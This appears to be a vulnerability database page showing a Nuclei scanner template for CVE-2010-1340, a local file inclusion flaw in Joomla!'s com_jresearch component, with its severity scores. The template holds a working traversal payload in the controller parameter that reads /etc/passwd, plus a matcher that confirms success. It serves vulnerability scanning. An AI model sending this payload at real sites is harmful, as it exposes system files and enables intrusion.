Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1340
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component com_jresearch - 'Controller' Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
8
cve-2010-1340
joomla
local file inclusion
exploit-db
packetstorm
joomla-research

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.011

Percentile

85.0%

A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1340

info:
  name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/33797
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1340
    - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1340
    cwe-id: CWE-22
    epss-score: 0.01155
    epss-percentile: 0.83281
    cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla-research
    product: com_jresearch
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008afd34392382e5f6b19579d04b60518d4f35a6d45218dc673a8ef6c3f0e5207a022023ed93d4307ee15b5771ab85343fba0cc623272b9ac9c067059ffec8e40939d4:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.011

Percentile

85.0%

Related for NUCLEI:CVE-2010-1340